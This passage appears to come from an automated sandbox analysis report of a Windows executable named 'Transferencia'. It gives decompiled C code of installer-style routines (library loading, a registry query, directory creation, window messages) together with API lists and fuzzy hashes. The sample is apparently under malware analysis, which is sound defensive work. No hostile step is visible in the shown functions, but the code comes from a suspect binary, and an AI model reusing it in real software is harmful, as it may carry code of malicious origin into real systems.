                                                					}
                                                					L4:
                                                					_t36 = E00406956(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
                                                					if(_t36 == _t32) {
                                                						E0040557C(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
                                                					} else {
                                                						 *(_t39 - 4) = _t32;
                                                						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
                                                							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce28, 0x40a000); // executed
                                                						} else {
                                                							E00401423( *((intOrPtr*)(_t39 - 0x28)));
                                                							if( *_t36() != 0) {
                                                								 *(_t39 - 4) = 1;
                                                							}
                                                						}
                                                					}
                                                					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B69( *(_t39 + 8)) != 0) {
                                                						FreeLibrary( *(_t39 + 8));
                                                					}
                                                					goto L16;
                                                				}
                                                				_t31 = GetModuleHandleW(_t35); // executed
                                                				 *(_t39 + 8) = _t31;
                                                				if(_t31 != __ebx) {
                                                					goto L4;
                                                				}
                                                				goto L3;
                                                			}










                                                0x004020d8
                                                0x004020d8
                                                0x004020dd
                                                0x004020e4
                                                0x004021a3
                                                0x004022f1
                                                0x004022f1
                                                0x00402c2a
                                                0x00402c2d
                                                0x00402c39
                                                0x00402c39
                                                0x004020f3
                                                0x004020fd
                                                0x00402100
                                                0x00402110
                                                0x00402114
                                                0x0040211a
                                                0x0040211c
                                                0x0040211f
                                                0x0040219c
                                                0x00000000
                                                0x0040219c
                                                0x00402121
                                                0x0040212c
                                                0x00402130
                                                0x00402170
                                                0x00402132
                                                0x00402135
                                                0x00402138
                                                0x00402164
                                                0x0040213a
                                                0x0040213d
                                                0x00402146
                                                0x00402148
                                                0x00402148
                                                0x00402146
                                                0x00402138
                                                0x00402178
                                                0x00402191
                                                0x00402191
                                                0x00000000
                                                0x00402178
                                                0x00402103
                                                0x0040210b
                                                0x0040210e
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                  • Part of subcall function 0040557C: lstrlenW.KERNEL32(007A0F28,00000000,0079F570,76CDEA30,?,?,?,?,?,?,?,?,?,004033F5,00000000,?), ref: 004055B4
                                                  • Part of subcall function 0040557C: lstrlenW.KERNEL32(004033F5,007A0F28,00000000,0079F570,76CDEA30,?,?,?,?,?,?,?,?,?,004033F5,00000000), ref: 004055C4
                                                  • Part of subcall function 0040557C: lstrcatW.KERNEL32(007A0F28,004033F5), ref: 004055D7
                                                  • Part of subcall function 0040557C: SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004055E9
                                                  • Part of subcall function 0040557C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
                                                  • Part of subcall function 0040557C: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405629
                                                  • Part of subcall function 0040557C: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637
                                                • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 334405425-0
                                                • Opcode ID: d3289adf4ebaccc714292094f0131b2a55a31b2be69c8ba73e82ed6e367305b0
                                                • Instruction ID: 444e3b163f15bd358be0b4800c507c2147bc3560cfb58e26f6c7225f93e15a3b
                                                • Opcode Fuzzy Hash: d3289adf4ebaccc714292094f0131b2a55a31b2be69c8ba73e82ed6e367305b0
                                                • Instruction Fuzzy Hash: D621D471904104FACF11AFA5CF48E9E7A71BF48354F20413BF505B91E1DBBD8A929A1D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 59%
                                                			E00401B9B(void* __ebx) {
                                                				intOrPtr _t8;
                                                				void* _t9;
                                                				void _t12;
                                                				void* _t14;
                                                				void* _t22;
                                                				void* _t25;
                                                				void* _t30;
                                                				char* _t32;
                                                				void* _t33;
                                                				void* _t34;
                                                				void* _t37;
                                                
                                                				_t28 = __ebx;
                                                				_t8 =  *((intOrPtr*)(_t37 - 0x28));
                                                				_t33 =  *0x40ce28; // 0x0
                                                				if(_t8 == __ebx) {
                                                					if( *((intOrPtr*)(_t37 - 0x2c)) == __ebx) {
                                                						_t9 = GlobalAlloc(0x40, 0x804); // executed
                                                						_t34 = _t9;
                                                						_t5 = _t34 + 4; // 0x4
                                                						E00406557(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x30)));
                                                						_t12 =  *0x40ce28; // 0x0
                                                						 *_t34 = _t12;
                                                						 *0x40ce28 = _t34;
                                                					} else {
                                                						if(_t33 == __ebx) {
                                                							 *((intOrPtr*)(_t37 - 4)) = 1;
                                                						} else {
                                                							_t3 = _t33 + 4; // 0x4
                                                							E0040651A(_t30, _t3);
                                                							_push(_t33);
                                                							 *0x40ce28 =  *_t33;
                                                							GlobalFree();
                                                						}
                                                					}
                                                					goto L15;
                                                				} else {
                                                					while(1) {
                                                						_t8 = _t8 - 1;
                                                						if(_t33 == _t28) {
                                                							break;
                                                						}
                                                						_t33 =  *_t33;
                                                						if(_t8 != _t28) {
                                                							continue;
                                                						} else {
                                                							if(_t33 == _t28) {
                                                								break;
                                                							} else {
                                                								_t36 = _t33 + 4;
                                                								_t32 = L"Call";
                                                								E0040651A(_t32, _t33 + 4);
                                                								_t22 =  *0x40ce28; // 0x0
                                                								E0040651A(_t36, _t22 + 4);
                                                								_t25 =  *0x40ce28; // 0x0
                                                								_push(_t32);
                                                								_push(_t25 + 4);
                                                								E0040651A();
                                                								L15:
                                                								 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t37 - 4));
                                                								_t14 = 0;
                                                							}
                                                						}
                                                						goto L17;
                                                					}
                                                					_push(0x200010);
                                                					_push(E00406557(_t28, _t30, _t33, _t28, 0xffffffe8));
                                                					E00405B7A();
                                                					_t14 = 0x7fffffff;
                                                				}
                                                				L17:
                                                				return _t14;
                                                			}














                                                0x00401b9b
                                                0x00401b9b
                                                0x00401b9e
                                                0x00401ba6
                                                0x00401bef
                                                0x00401c1d
                                                0x00401c26
                                                0x00401c28
                                                0x00401c2c
                                                0x00401c31
                                                0x00401c36
                                                0x00401c38
                                                0x00401bf1
                                                0x00401bf3
                                                0x0040292e
                                                0x00401bf9
                                                0x00401bf9
                                                0x00401bfe
                                                0x00401c05
                                                0x00401c06
                                                0x00401c0b
                                                0x00401c0b
                                                0x00401bf3
                                                0x00000000
                                                0x00401ba8
                                                0x00401ba8
                                                0x00401ba8
                                                0x00401bab
                                                0x00000000
                                                0x00000000
                                                0x00401bb1
                                                0x00401bb5
                                                0x00000000
                                                0x00401bb7
                                                0x00401bb9
                                                0x00000000
                                                0x00401bbf
                                                0x00401bbf
                                                0x00401bc2
                                                0x00401bc9
                                                0x00401bce
                                                0x00401bd8
                                                0x00401bdd
                                                0x00401be2
                                                0x00401be6
                                                0x00402a94
                                                0x00402c2a
                                                0x00402c2d
                                                0x00402c33
                                                0x00402c33
                                                0x00401bb9
                                                0x00000000
                                                0x00401bb5
                                                0x0040238a
                                                0x00402397
                                                0x00402398
                                                0x0040239d
                                                0x0040239d
                                                0x00402c35
                                                0x00402c39

                                                APIs
                                                • GlobalFree.KERNEL32 ref: 00401C0B
                                                • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                                                  • Part of subcall function 00406557: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066FC
                                                  • Part of subcall function 00406557: lstrlenW.KERNEL32(Call,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: Global$AllocFreelstrcatlstrlen
                                                • String ID: Call
                                                • API String ID: 3292104215-1824292864
                                                • Opcode ID: b890c972c8bf46be985b92796f08af71a41c27e005c5bd4be6b96cad305d66d6
                                                • Instruction ID: 26dbd5a77eb58e605bfe28f9d4715249581a5b1b61a00b50ad00dbbd18183bd9
                                                • Opcode Fuzzy Hash: b890c972c8bf46be985b92796f08af71a41c27e005c5bd4be6b96cad305d66d6
                                                • Instruction Fuzzy Hash: CE219373904210EBD721AFA4DEC4A9E73A4EB08328715453BF542F72D0D6BCA8418B5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E004015C1(short __ebx, void* __eflags) {
                                                				void* _t17;
                                                				int _t23;
                                                				void* _t25;
                                                				signed char _t26;
                                                				short _t28;
                                                				short _t31;
                                                				short* _t34;
                                                				void* _t36;
                                                
                                                				_t28 = __ebx;
                                                				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                				_t17 = E00405E94(_t16);
                                                				_t32 = _t17;
                                                				if(_t17 != __ebx) {
                                                					do {
                                                						_t34 = E00405E16(_t32, 0x5c);
                                                						_t31 =  *_t34;
                                                						 *_t34 = _t28;
                                                						if(_t31 != _t28) {
                                                							L5:
                                                							_t25 = E00405AC8( *(_t36 + 8));
                                                						} else {
                                                							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405AE5(_t42) == 0) {
                                                								goto L5;
                                                							} else {
                                                								_t25 = E00405A4B( *(_t36 + 8)); // executed
                                                							}
                                                						}
                                                						if(_t25 != _t28) {
                                                							if(_t25 != 0xb7) {
                                                								L9:
                                                								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                							} else {
                                                								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                								if((_t26 & 0x00000010) == 0) {
                                                									goto L9;
                                                								}
                                                							}
                                                						}
                                                						 *_t34 = _t31;
                                                						_t32 = _t34 + 2;
                                                					} while (_t31 != _t28);
                                                				}
                                                				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                					_push(0xfffffff5);
                                                					E00401423();
                                                				} else {
                                                					E00401423(0xffffffe6);
                                                					E0040651A(0x7b4000,  *(_t36 + 8));
                                                					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                					if(_t23 == 0) {
                                                						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                					}
                                                				}
                                                				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t36 - 4));
                                                				return 0;
                                                			}











                                                0x004015c1
                                                0x004015c9
                                                0x004015cc
                                                0x004015d1
                                                0x004015d5
                                                0x004015d7
                                                0x004015df
                                                0x004015e1
                                                0x004015e4
                                                0x004015ea
                                                0x00401604
                                                0x00401607
                                                0x004015ec
                                                0x004015ec
                                                0x004015ef
                                                0x00000000
                                                0x004015fa
                                                0x004015fd
                                                0x004015fd
                                                0x004015ef
                                                0x0040160e
                                                0x00401615
                                                0x00401624
                                                0x00401624
                                                0x00401617
                                                0x0040161a
                                                0x00401622
                                                0x00000000
                                                0x00000000
                                                0x00401622
                                                0x00401615
                                                0x00401627
                                                0x0040162b
                                                0x0040162c
                                                0x004015d7
                                                0x00401634
                                                0x00401663
                                                0x004022f1
                                                0x00401636
                                                0x00401638
                                                0x00401645
                                                0x0040164d
                                                0x00401655
                                                0x0040165b
                                                0x0040165b
                                                0x00401655
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                  • Part of subcall function 00405E94: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nstC730.tmp,?,00405F08,C:\Users\user\AppData\Local\Temp\nstC730.tmp,C:\Users\user\AppData\Local\Temp\nstC730.tmp,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EA2
                                                  • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EA7
                                                  • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EBF
                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                  • Part of subcall function 00405A4B: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A8E
                                                • SetCurrentDirectoryW.KERNELBASE(?,007B4000,?,00000000,000000F0), ref: 0040164D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                • String ID:
                                                • API String ID: 1892508949-0
                                                • Opcode ID: ea366b61ea7e0f954f802211c46f95b4e790a63d7230a0a8c72c366b88b3d3fb
                                                • Instruction ID: b26d59bbbb8bd31aa62bfaa3988508fb5429084e49f4d8f394da2dab55023cb6
                                                • Opcode Fuzzy Hash: ea366b61ea7e0f954f802211c46f95b4e790a63d7230a0a8c72c366b88b3d3fb
                                                • Instruction Fuzzy Hash: E611E631504115EBCF216FA5CD40A9F36A0EF15369B28493BF541B52F1DA3E4A819F4D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 84%
                                                			E0040252A(int* __ebx, char* __edi) {
                                                				void* _t17;
                                                				short* _t18;
                                                				void* _t35;
                                                				void* _t37;
                                                				void* _t40;
                                                
                                                				_t33 = __edi;
                                                				_t27 = __ebx;
                                                				_t17 = E00402DE6(_t40, 0x20019); // executed
                                                				_t35 = _t17;
                                                				_t18 = E00402DA6(0x33);
                                                				 *__edi = __ebx;
                                                				if(_t35 == __ebx) {
                                                					 *(_t37 - 4) = 1;
                                                				} else {
                                                					 *(_t37 - 0x10) = 0x800;
                                                					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
                                                						L7:
                                                						 *_t33 = _t27;
                                                						 *(_t37 - 4) = 1;
                                                					} else {
                                                						if( *(_t37 + 8) == 4) {
                                                							__eflags =  *(_t37 - 0x20) - __ebx;
                                                							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
                                                							E00406461(__edi,  *__edi);
                                                						} else {
                                                							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                								 *(_t37 - 4) =  *(_t37 - 0x20);
                                                								_t33[0x7fe] = _t27;
                                                							} else {
                                                								goto L7;
                                                							}
                                                						}
                                                					}
                                                					_push(_t35);
                                                					RegCloseKey();
                                                				}
                                                				 *0x7a8ae8 =  *0x7a8ae8 +  *(_t37 - 4);
                                                				return 0;
                                                			}








                                                0x0040252a
                                                0x0040252a
                                                0x0040252f
                                                0x00402536
                                                0x00402538
                                                0x0040253f
                                                0x00402542
                                                0x0040292e
                                                0x00402548
                                                0x0040254b
                                                0x00402566
                                                0x00402596
                                                0x00402596
                                                0x00402599
                                                0x00402568
                                                0x0040256c
                                                0x00402585
                                                0x0040258c
                                                0x0040258f
                                                0x0040256e
                                                0x00402571
                                                0x0040257c
                                                0x004025f5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402571
                                                0x0040256c
                                                0x004025fc
                                                0x004025fd
                                                0x004025fd
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nstC730.tmp,00000000,00000011,00000002), ref: 004025FD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue
                                                • String ID:
                                                • API String ID: 3356406503-0
                                                • Opcode ID: 0694351e98cd469bae9d726cc189f6ef90d59886634df9e537887f839f6a2698
                                                • Instruction ID: 571b9b924b31111faeddb2e20a0922d1bec3187f76108aa99b1997940c0dfa40
                                                • Opcode Fuzzy Hash: 0694351e98cd469bae9d726cc189f6ef90d59886634df9e537887f839f6a2698
                                                • Instruction Fuzzy Hash: D5116D71904219EADF14DFA4DA589AE7774FF04345B20843BE001B62C0E7B88A45EB5E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 69%
                                                			E00401389(signed int _a4, struct HWND__* _a10) {
                                                				intOrPtr* _t6;
                                                				void* _t8;
                                                				void* _t10;
                                                				signed int _t11;
                                                				void* _t12;
                                                				signed int _t16;
                                                				signed int _t17;
                                                
                                                				_t17 = _a4;
                                                				while(_t17 >= 0) {
                                                					_t6 = _t17 * 0x1c +  *0x7a8a90;
                                                					if( *_t6 == 1) {
                                                						break;
                                                					}
                                                					_push(_t6); // executed
                                                					_t8 = E00401434(); // executed
                                                					if(_t8 == 0x7fffffff) {
                                                						return 0x7fffffff;
                                                					}
                                                					_t10 = E0040136D(_t8);
                                                					if(_t10 != 0) {
                                                						_t11 = _t10 - 1;
                                                						_t16 = _t17;
                                                						_t17 = _t11;
                                                						_t12 = _t11 - _t16;
                                                					} else {
                                                						_t12 = _t10 + 1;
                                                						_t17 = _t17 + 1;
                                                					}
                                                					if(_a10 != 0) {
                                                						 *0x7a7a4c =  *0x7a7a4c + _t12;
                                                						SendMessageW(_a10, 0x402, MulDiv( *0x7a7a4c, 0x7530,  *0x7a7a34), 0); // executed
                                                					}
                                                				}
                                                				return 0;
                                                			}










                                                0x0040138a
                                                0x004013fa
                                                0x0040139b
                                                0x004013a0
                                                0x00000000
                                                0x00000000
                                                0x004013a2
                                                0x004013a3
                                                0x004013ad
                                                0x00000000
                                                0x00401404
                                                0x004013b0
                                                0x004013b7
                                                0x004013bd
                                                0x004013be
                                                0x004013c0
                                                0x004013c2
                                                0x004013b9
                                                0x004013b9
                                                0x004013ba
                                                0x004013ba
                                                0x004013c9
                                                0x004013cb
                                                0x004013f4
                                                0x004013f4
                                                0x004013c9
                                                0x00000000

                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 0f992e2ae6cf3b1b8dd96a4b6b0adf3515dff43e38b3359cc4322e8ed16e10f0
                                                • Instruction ID: 637f0bbede897030ab690e2e99e2181d797c58f7d0d2aab6e1f53bdf2be6ce4b
                                                • Opcode Fuzzy Hash: 0f992e2ae6cf3b1b8dd96a4b6b0adf3515dff43e38b3359cc4322e8ed16e10f0
                                                • Instruction Fuzzy Hash: 9501F432624220ABE7195B389D05B2A3698E751314F10C13FF955F69F1EA78CC02DB4D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: Window$EnableShow
                                                • String ID:
                                                • API String ID: 1136574915-0
                                                • Opcode ID: 393b5c21bb7cc3de8bedbfe4bad105ee39a9eabd1884b7fb5bcfa8057cf0f7ce
                                                • Instruction ID: 6c41119d880c6e907524726e204bf21ac727531236896e2a35a455d3971ed6d0
                                                • Opcode Fuzzy Hash: 393b5c21bb7cc3de8bedbfe4bad105ee39a9eabd1884b7fb5bcfa8057cf0f7ce
                                                • Instruction Fuzzy Hash: 62E01272908211CFE705EBA4EE495AE77B4EB40315710497FE501F11D1DBB94D00865D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004068E7(signed int _a4) {
                                                				struct HINSTANCE__* _t5;
                                                				signed int _t10;
                                                
                                                				_t10 = _a4 << 3;
                                                				_t8 =  *(_t10 + 0x40a3e0);
                                                				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                                                				if(_t5 != 0) {
                                                					L2:
                                                					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                                                				}
                                                				_t5 = E00406877(_t8); // executed
                                                				if(_t5 == 0) {
                                                					return 0;
                                                				}
                                                				goto L2;
                                                			}





                                                0x004068ef
                                                0x004068f2
                                                0x004068f9
                                                0x00406901
                                                0x0040690d
                                                0x00000000
                                                0x00406914
                                                0x00406904
                                                0x0040690b
                                                0x00000000
                                                0x0040691c
                                                0x00000000

                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,00000020,?,0040361A,0000000B), ref: 004068F9
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406914
                                                  • Part of subcall function 00406877: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040688E
                                                  • Part of subcall function 00406877: wsprintfW.USER32 ref: 004068C9
                                                  • Part of subcall function 00406877: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068DD
                                                Memory Dump Source
